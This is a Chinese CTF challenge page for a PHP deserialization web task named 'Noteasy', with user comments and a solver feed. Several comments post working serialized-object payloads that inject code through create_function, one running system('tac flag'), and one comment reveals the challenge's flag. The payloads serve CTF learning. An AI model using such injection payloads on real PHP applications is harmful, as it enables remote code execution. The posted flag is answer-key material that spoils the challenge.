unserialize-NoteasyWEB 未解决

分数: 30 金币: 3
题目作者: 云牧青
一  血: Lazzaro
一血奖励: 5金币
解  决: 749
提  示:
描  述:
不简单的反序列化
...
登录回复
评论
ixin 5月前
举报

真心不会等在提升一段时间再来做

回复 0
对对对对对对对对 6月前
举报

看评论区师傅们博客内对于create_function的理解,另外还有序列化的格式语法

回复 0
gxrtbtc 10月前
举报

序列化字符串中%3B%7D%3B部分导致结构断裂(未闭合的花括号和分号)1013 私有属性命名未正确处理空字符\0(应为\0类名\0属性名格式)13 功能失效 create_function构造的函数体;}highlight_file("/flag");/*存在语法错误: ;}会提前结束函数定义 /*未正确注释后续代码21

回复 0
locust 1年前
举报

O%3A7%3A%22Noteasy%22%3A2%3A%7Bs%3A10%3A%22%00Noteasy%00a%22%3Bs%3A15%3A%22create_function%22%3Bs%3A10%3A%22%00Noteasy%00b%22%3Bs%3A29%3A%22%3B%7D%3Bhighlight_file%28%22%2Fflag%22%29%3B%2F%2A%22%3B%7D

回复 6
Jiafeng 1年前
举报

flag{d45ca0bf896cdf6a9903d5030554214e} ; 这里主要是考察反序列化的使用,这里给出一个连接,学会使用create_function函数来进行反序列化的操作; https://blog.csdn.net/weixin_61785633/article/details/131159553

回复 0
雾島风起時 1年前
举报

真心不会等在提升一段时间再来做

回复 1
小猫猫嗷嗷叫 1年前
举报

p=O:7:"Noteasy":2:{s:10:"%00Noteasy%00a";s:15:"create_function";s:10:"%00Noteasy%00b";s:24:";}system("tac%20flag");/*;";}

回复 0
xiaoxiao972521 2年前
举报

一看评论都寄了,我就不开场景了,啊哈哈哈哈

回复 0
XRain 2年前
举报

这种题不会真没办法,相当于当场挖出 create_function 的漏洞,挺难的,只能靠平时看文章和关注安全动态,记下各种技巧。

回复 0
Youmos 2年前
举报

寄了,不会

回复 0

WriteUp

image
云牧青

5 金币

立即查看

评分(2)

解题动态

linzixi 攻破了该题 1天前
suxiansheng 攻破了该题 1天前
FlyXz 攻破了该题 5天前
tytu 攻破了该题 5天前
Kakivare 攻破了该题 5天前
alden 攻破了该题 5天前
x_xisr 攻破了该题 9天前
alonely 攻破了该题 9天前
kadbl777 攻破了该题 10天前
yinlin 攻破了该题 12天前
陈陈陈 攻破了该题 14天前
lunaaaaa 攻破了该题 16天前
2117783710 攻破了该题 17天前
粉红色的-毛 攻破了该题 17天前
wbq012 攻破了该题 19天前
xuyuyan999 攻破了该题 19天前
dlgz 攻破了该题 23天前
二等饼干 攻破了该题 1月前
树木有点绿 攻破了该题 1月前
2523822945 攻破了该题 1月前
问题反馈